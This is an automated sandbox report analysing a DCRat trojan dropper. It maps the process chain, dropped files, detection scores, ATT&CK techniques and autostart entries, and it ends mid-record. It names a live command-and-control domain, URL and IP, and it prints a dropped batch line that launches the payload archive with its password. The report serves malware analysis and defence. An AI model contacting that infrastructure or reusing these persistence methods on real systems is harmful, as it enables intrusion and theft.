Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd VolumeInformation
Source: C:\Chaindriver.exe | Queries volume information: C:\Chaindriver.exe VolumeInformation
Source: C:\Chaindriver.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Chaindriver.exe | Queries volume information: C:\Chaindriver.exe VolumeInformation
Source: C:\Chaindriver.exe | Queries volume information: C:\Chaindriver.exe VolumeInformation
Source: C:\Recovery\Memory Compression.exe | Queries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
Source: C:\Recovery\Memory Compression.exe | Queries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
Source: C:\Recovery\Memory Compression.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Queries volume information: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe VolumeInformation
Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Queries volume information: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe VolumeInformation
Source: C:\Chaindriver.exe | Queries volume information: C:\Chaindriver.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Queries volume information: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe VolumeInformation
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EDC7A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EF6B50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C0365164 GetVersionExW
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Chaindriver.exe PID: 7852, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Memory Compression.exe PID: 6924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Chaindriver.exe PID: 7712, type: MEMORYSTR
Source: Yara match | File source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Recovery\Memory Compression.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
Source: Yara match | File source: C:\Chaindriver.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Recovery\Memory Compression.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
Source: Yara match | File source: C:\Chaindriver.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED

                          Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Chaindriver.exe PID: 7852, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Memory Compression.exe PID: 6924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Chaindriver.exe PID: 7712, type: MEMORYSTR
Source: Yara match | File source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Recovery\Memory Compression.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
Source: Yara match | File source: C:\Chaindriver.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Recovery\Memory Compression.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
Source: Yara match | File source: C:\Chaindriver.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED
MITRE ATT&CK Matrix (per tactic; a number in parentheses is the count of matching signatures, entries without a number carry no matches)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (11); Native API (1); Scheduled Task/Job (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scripting (1); DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (3); DLL Side-Loading (1); File Deletion (1); Masquerading (31); Virtualization/Sandbox Evasion (31); Process Injection (11)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); File and Directory Discovery (3); System Information Discovery (37); Security Software Discovery (121); Process Discovery (1); Virtualization/Sandbox Evasion (31); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1583176, Sample: t8F7Ic986c.exe, Startdate: 02/01/2025, Architecture: WINDOWS, Score: 100)

Contacted host: 797441cm.n9shteam2.top (185.158.202.52, PREVIDER-ASNL, Netherlands), local ports 49730, 49737, 49738, from Memory Compression.exe
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 15 other signatures

Process tree (dropped files and signatures listed under the process they belong to; indentation is parent to child):

t8F7Ic986c.exe
  dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\select.pyd (PE32+); C:\Users\user\AppData\Local\...\python39.dll (PE32+); 8 other malicious files
  signature: Found pyInstaller with non standard icon
  t8F7Ic986c.exe
    cmd.exe
      conhost.exe
      BoosterX.exe
        dropped: C:\Chaindriver.sfx.exe (PE32+)
        signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
        cmd.exe
          conhost.exe
          Chaindriver.sfx.exe
            dropped: C:\Chaindriver.exe (PE32)
            signature: Multi AV Scanner detection for dropped file
            Chaindriver.exe
              dropped: C:\Users\user\Desktop\viEjRGTv.log (PE32); C:\Users\user\Desktop\Zfmnrnxn.log (PE32); C:\Users\user\Desktop\PxTXHLsG.log (PE32); 7 other malicious files
              signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; 4 other signatures
              csc.exe
                dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
                signature: Infects executable files (exe, dll, sys, html)
                conhost.exe
                cvtres.exe
              cmd.exe
                conhost.exe
                chcp.com
                w32tm.exe
                Chaindriver.exe
              schtasks.exe
              17 other processes
Memory Compression.exe
  network: 797441cm.n9shteam2.top 185.158.202.52 (ports 49730, 49737, 49738)
  dropped: C:\Users\user\Desktop\TkRgFrOc.log (PE32); C:\Users\user\Desktop\KGIrVxyv.log (PE32); C:\Users\user\Desktop\FnBzuKhI.log (PE32); 2 other malicious files
  cmd.exe
    conhost.exe
    chcp.com
    w32tm.exe
NOFqHeDosUIopsPGLT.exe
  signature: Multi AV Scanner detection for dropped file
5 other processes

Source | Detection | Scanner | Label
t8F7Ic986c.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
t8F7Ic986c.exe | 61% | Virustotal |
t8F7Ic986c.exe | 100% | Avira | TR/Drop.Agent.uteef

Source | Detection | Scanner | Label
C:\Recovery\NOFqHeDosUIopsPGLT.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Recovery\Memory Compression.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\KGIrVxyv.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\TkRgFrOc.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Chaindriver.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\Default\Pictures\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | 100% | Avira | TR/AVI.Agent.denui
C:\Recovery\NOFqHeDosUIopsPGLT.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\PxTXHLsG.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Recovery\NOFqHeDosUIopsPGLT.exe | 100% | Joe Sandbox ML |
C:\Recovery\Memory Compression.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\HTKiXRcY.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\BXpblVtN.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\TkRgFrOc.log | 100% | Joe Sandbox ML |
C:\Chaindriver.exe | 100% | Joe Sandbox ML |
C:\Users\Default\Pictures\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Recovery\NOFqHeDosUIopsPGLT.exe | 100% | Joe Sandbox ML |
C:\Chaindriver.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Chaindriver.sfx.exe | 18% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Recovery\Memory Compression.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\NOFqHeDosUIopsPGLT.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\Pictures\RuntimeBroker.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | 57% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Local\Temp\_MEI75042\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd | 0% | ReversingLabs |
C:\Users\user\Desktop\BXpblVtN.log | 8% | ReversingLabs |
C:\Users\user\Desktop\FnBzuKhI.log | 25% | ReversingLabs |
C:\Users\user\Desktop\HTKiXRcY.log | 8% | ReversingLabs |
C:\Users\user\Desktop\KGIrVxyv.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PxTXHLsG.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TkRgFrOc.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\Zfmnrnxn.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\viEjRGTv.log | 25% | ReversingLabs |
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label
http://crl4.digiceN$Qw3 | 0% | Avira URL Cloud | safe
http://crl3.digiN$Qw3 | 0% | Avira URL Cloud | safe
http://797441cm.n9shteam2.top | 100% | Avira URL Cloud | malware
http://797441cm.n9shteam2.top/Videouploads.php | 100% | Avira URL Cloud | malware
http://crl3.digiN$Qw | 0% | Avira URL Cloud | safe
http://797441cm.n9shteam2.top/ | 100% | Avira URL Cloud | malware
http://crl4.digice | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
797441cm.n9shteam2.top | 185.158.202.52 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://797441cm.n9shteam2.top/Videouploads.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1666242087.0000023EBDF00000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://python.org/dev/peps/pep-0263/ | t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmp | false | | high
http://crl3.digiN$Qw | t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl3.digiN$Qw3 | t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://797441cm.n9shteam2.top | Memory Compression.exe, 00000025.00000002.1821172623.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.openssl.org/H | libcrypto-1_1.dll.0.dr | false | | high
http://797441cm.n9shteam2.top/ | Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://crl4.digice | t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.python.org/dev/peps/pep-0205/ | t8F7Ic986c.exe, 00000000.00000003.1656647593.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr | false | | high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl4.digiceN$Qw3 | t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl3.digi | t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Chaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.python.org/download/releases/2.3/mro/. | base_library.zip.0.dr | false | | high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.158.202.52 | 797441cm.n9shteam2.top | Netherlands | | 20847 | PREVIDER-ASNL | true
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1583176
                                                  Start date and time:2025-01-02 07:41:07 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 46s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:62
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:t8F7Ic986c.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:a4923d4db3234b3905ad3097cc03af46.exe
                                                  Detection:MAL
                                                  Classification:mal100.spre.troj.expl.evad.winEXE@63/47@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 61.5%
                                                  HCA Information:
                                                  • Successful, ratio: 58%
                                                  • Number of executed functions: 133
                                                  • Number of non-executed functions: 173
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target Chaindriver.exe, PID 2336 because it is empty
                                                  • Execution Graph export aborted for target Chaindriver.exe, PID 7712 because it is empty
                                                  • Execution Graph export aborted for target Memory Compression.exe, PID 6924 because it is empty
                                                  • Execution Graph export aborted for target NOFqHeDosUIopsPGLT.exe, PID 7976 because it is empty
• Execution Graph export aborted for target t8F7Ic986c.exe, PID 7520 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:42:12 | API Interceptor | 1x Sleep call for process: Memory Compression.exe modified
06:42:04 | Task Scheduler | Run new task: Chaindriver path: "C:\Chaindriver.exe"
06:42:04 | Task Scheduler | Run new task: ChaindriverC path: "C:\Chaindriver.exe"
06:42:04 | Task Scheduler | Run new task: Memory Compression path: "C:\Recovery\Memory Compression.exe"
06:42:04 | Task Scheduler | Run new task: Memory CompressionM path: "C:\Recovery\Memory Compression.exe"
06:42:05 | Task Scheduler | Run new task: NOFqHeDosUIopsPGLT path: "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
06:42:05 | Task Scheduler | Run new task: NOFqHeDosUIopsPGLTN path: "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
06:42:05 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Users\Default\Pictures\RuntimeBroker.exe"
06:42:05 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Users\Default\Pictures\RuntimeBroker.exe"
06:42:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
06:42:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
06:42:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Recovery\Memory Compression.exe"
06:42:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chaindriver "C:\Chaindriver.exe"
06:42:38 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
06:42:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
06:42:54 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Recovery\Memory Compression.exe"
06:43:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chaindriver "C:\Chaindriver.exe"
06:43:10 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
06:43:18 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
06:43:26 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Recovery\Memory Compression.exe"
06:43:34 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Chaindriver "C:\Chaindriver.exe"
06:43:51 | Autostart | Run: WinLogon Shell "C:\Recovery\NOFqHeDosUIopsPGLT.exe"
06:44:00 | Autostart | Run: WinLogon Shell "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.158.202.52 | QH67JSdZWl.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 487997cm.renyash.top/VideoFlowergeneratorTestpublic.php
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
PREVIDER-ASNL | QH67JSdZWl.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 185.158.202.52
| kWZnXz2Fw7.elf | Get hash | malicious | Mirai | Browse
• 84.241.133.1
| aQvU3QHA3N.elf | Get hash | malicious | Unknown | Browse
• 62.165.97.41
| loligang.arm7.elf | Get hash | malicious | Mirai | Browse
• 84.241.184.118
| http://maritimecybersecurity.nl | Get hash | malicious | Unknown | Browse
• 31.7.2.29
| 21y8z80div.elf | Get hash | malicious | Mirai | Browse
• 80.65.103.15
| botx.arm7.elf | Get hash | malicious | Mirai | Browse
• 84.241.184.103
| BLBq6xYqWy.elf | Get hash | malicious | Mirai | Browse
• 80.65.126.250
| https://expressinvoice.mijnparagon-cc.nl/ | Get hash | malicious | Unknown | Browse
• 84.241.158.7
| https://expressinvoice.mijnparagon-cc.nl/ | Get hash | malicious | Unknown | Browse
• 84.241.158.7
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):45
                                                  Entropy (8bit):4.552638373963222
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDj6lOTzFIVUGR:hcEyVUGR
                                                  MD5:ACEF7B500D9FC3EA5E912ECF10781EAA
                                                  SHA1:844D68AA82584B89B15EF3F82BD04D70FB0EB856
                                                  SHA-256:DED8283434BD7C870ABD09FC6359A143B289BD62B3956F9D1D2AC14BFF143B08
                                                  SHA-512:59ECC8F889A0299987114377FBEA6096E419316CCBA80C2B1EAFE5D6D4E469933EA45DBA8E4939161F5707D267BFD4530BE70B143BCFBB735E7503F53DC4CDC7
                                                  Malicious:false
                                                  Preview:@echo off....start Chaindriver.sfx.exe -p1234
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):99
                                                  Entropy (8bit):5.515177200647307
                                                  Encrypted:false
                                                  SSDEEP:3:LOPQDdHbOWIdXMSUtVyGibnfXz/fyzTjiLMkn:LOedHbOPdcSUvyGMPz/fyzpk
                                                  MD5:CDE9403651488E5763E0BAE6C178F8F4
                                                  SHA1:ED2753F79D5F8A87ED2E75A29CD37CD75BB445AF
                                                  SHA-256:524F853C5C7A321238A796843CBBD008C8C45531229987AEDB0FB375CDF0F189
                                                  SHA-512:259CC01AD7096A41B5D8B4046E01430D80F53F763AB7E0F17EA6686F412A93918326AA1C6E7EE7BE5565860D835CE4ACBD000211D4E5F8813BB89BF2AB5328D3
                                                  Malicious:false
                                                  Preview:zmj5nHrhkxjuf8r49tYuoVaYA3m82i7muBQRlBHoY6P93WyxCzUnCObeLK5uesoBz7AesaT7ltWrFbfnFz5COUjgjwGaGXKpSNJ
                                                  Process:C:\Chaindriver.sfx.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
